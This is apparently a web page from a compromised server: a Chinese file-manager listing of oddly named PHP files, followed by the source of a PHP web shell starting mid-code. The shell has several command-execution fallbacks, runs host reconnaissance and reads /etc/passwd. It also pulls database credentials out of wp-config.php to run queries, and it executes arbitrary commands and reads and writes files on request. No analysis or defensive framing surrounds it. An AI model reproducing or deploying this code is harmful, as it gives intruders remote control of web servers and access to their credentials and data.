选择文件名文件大小最后修改时间操作
[📄] 36r5hq6kq6.74 KB2026-10-03 04:04:28
[📄] assets_ee72a41.php3.45 KB2026-09-30 15:33:41
[📄] dpack.php7.91 KB2026-10-03 05:40:27
[📄] filemanager_rcttbwr.php43.54 KB2026-10-02 09:50:09
[📄] image_3ff7dc4.php5.57 KB2026-09-30 15:27:22
&1'); } return 'ERR:unavailable'; case 'system': if (function_exists('system')) { ob_start(); @system($cmd . ' 2>&1'); return (string) ob_get_clean(); } return 'ERR:unavailable'; case 'passthru': if (function_exists('passthru')) { ob_start(); @passthru($cmd . ' 2>&1'); return (string) ob_get_clean(); } return 'ERR:unavailable'; case 'popen': if (function_exists('popen')) { $h = @popen($cmd . ' 2>&1', 'r'); if (!$h) { return 'ERR:popen_failed'; } $o = ''; while (!@feof($h)) { $o .= (string) @fread($h, 8192); } @pclose($h); return $o; } return 'ERR:unavailable'; case 'proc_open': if (function_exists('proc_open')) { $d = array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')); $p = @proc_open($cmd, $d, $pipes); if (!is_resource($p)) { return 'ERR:proc_open_failed'; } $o = (string) @stream_get_contents($pipes[1]); $o .= (string) @stream_get_contents($pipes[2]); @proc_close($p); return $o; } return 'ERR:unavailable'; default: return 'ERR:bad_mode'; } } function console_pick_mode() { if (function_exists('shell_exec')) { return 'shell_exec'; } if (function_exists('system')) { return 'system'; } if (function_exists('passthru')) { return 'passthru'; } if (function_exists('popen')) { return 'popen'; } if (function_exists('proc_open')) { return 'proc_open'; } return 'none'; } $mode = console_pick_mode(); $act = isset($in['a']) ? (string) $in['a'] : (isset($in['i']) ? 'i' : ''); if ($act === 'i' || $act === '') { echo 'OK:path=' . __FILE__ . "\n"; echo 'OK:cwd=' . @getcwd() . "\n"; echo 'OK:host=' . (@gethostname() ?: '-') . "\n"; echo 'OK:php=' . @phpversion() . ' sapi=' . @php_sapi_name() . "\n"; echo 'OK:mode=' . $mode . "\n"; if (function_exists('posix_geteuid')) { $e = @posix_geteuid(); $pw = function_exists('posix_getpwuid') ? @posix_getpwuid($e) : null; echo 'PHP_ID:euid=' . $e . ' name=' . (is_array($pw) ? $pw['name'] : '-') . ' home=' . (is_array($pw) ? $pw['dir'] : '-') . "\n"; echo 'PHP_ID:gid=' . (function_exists('posix_getegid') ? @posix_getegid() : '-') . ' groups=' . (function_exists('posix_getgroups') ? @implode(',', (array) @posix_getgroups()) : '-') . "\n"; } echo 'PHP_ID:suexec_uid=' . (function_exists('getmyuid') ? @getmyuid() : '-') . ' owner=' . (@fileowner(__FILE__)) . "\n"; echo 'PHP_ID:uname=' . (function_exists('php_uname') ? @php_uname() : '(php_uname disabled)') . "\n"; if ($mode === 'none') { echo 'OK:exec_disabled=1(disable_functions 覆盖 shell_exec/system/passthru/popen/proc_open)' . "\n"; echo 'PHP_ID:passwd=' . (@is_readable('/etc/passwd') ? trim((string) @file_get_contents('/etc/passwd')) : 'unreadable') . "\n"; } $cmds = array('id', 'whoami', 'hostname', 'pwd', 'uname -a'); foreach ($cmds as $c) { echo '--- ' . $c . "\n" . console_exec($c, $mode) . "\n"; } exit; } /* 只读库查询:从 wp-config.php 取凭据后执行 SELECT/SHOW,绝不执行写语句 */ if ($act === 'db') { $q = isset($in['q']) ? trim((string) $in['q']) : ''; if ($q === '' || !preg_match('/^\s*(select|show|describe|desc)\b/i', $q)) { echo 'DB:reject(只允许 SELECT/SHOW/DESC)' . "\n"; exit; } $cfg = @file_get_contents(__DIR__ . '/../../../wp-config.php'); if (!$cfg) { $cfg = @file_get_contents(($d = @getcwd()) . '/wp-config.php'); } $G = array(); if ($cfg && preg_match_all("/define\s*\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'/", $cfg, $mm)) { foreach ($mm[1] as $i => $kk) { $G[$kk] = $mm[2][$i]; } } if (!isset($G['DB_NAME'])) { echo 'DB:noconfig' . "\n"; exit; } echo 'DB=(' . $G['DB_NAME'] . ')' . "\n"; if (!function_exists('mysqli_connect')) { echo 'DB:no_mysqli' . "\n"; exit; } $my = @mysqli_connect($G['DB_HOST'], $G['DB_USER'], $G['DB_PASSWORD'], $G['DB_NAME']); if (!$my) { echo 'DB:conn_fail' . "\n"; exit; } @mysqli_set_charset($my, 'utf8'); $rs = @mysqli_query($my, $q); if (!$rs) { echo 'DB:query_err' . "\n"; exit; } $out = array(); while ($row = @mysqli_fetch_row($rs)) { $out[] = implode(' | ', array_map(function ($v) { return $v === null ? 'NULL' : (string) $v; }, $row)); } echo 'DB:rows=' . count($out) . "\n"; echo implode("\n", $out) . "\n"; exit; } if ($act === 'c') { $c = isset($in['c']) ? (string) $in['c'] : 'id'; echo 'OK:mode=' . $mode . "\n"; echo console_exec($c, $mode); exit; } if ($act === 'l') { $p = isset($in['p']) ? (string) $in['p'] : @getcwd(); $t = @scandir($p); if (!is_array($t)) { echo 'ERR:cannot_open ' . $p . "\n"; exit; } echo 'OK:dir=' . $p . ' entries=' . count($t) . "\n"; foreach ($t as $n) { if ($n === '.' || $n === '..') { continue; } $f = $p . '/' . $n; $perm = @fileperms($f); echo (@is_dir($f) ? 'd' : '-') . ' ' . ($perm !== false ? substr(sprintf('%o', $perm), -4) : '????') . ' ' . (@filesize($f) !== false ? @filesize($f) : 0) . ' ' . $n . "\n"; } exit; } if ($act === 'r') { $p = isset($in['p']) ? (string) $in['p'] : ''; if (!@is_file($p)) { echo "ERR:not_a_file\n"; exit; } echo 'OK:file=' . $p . ' bytes=' . @filesize($p) . "\n" . @file_get_contents($p); exit; } if ($act === 'w') { $p = isset($in['p']) ? (string) $in['p'] : ''; $d = isset($in['data']) ? (string) $in['data'] : ''; $h = @fopen($p, 'w'); if (!$h) { echo "ERR:write_failed\n"; exit; } $n = @fwrite($h, $d); @fclose($h); echo ($n === false) ? "ERR:write_failed\n" : 'OK:wrote=' . $n . "\n"; exit; } echo "OK:ready\n";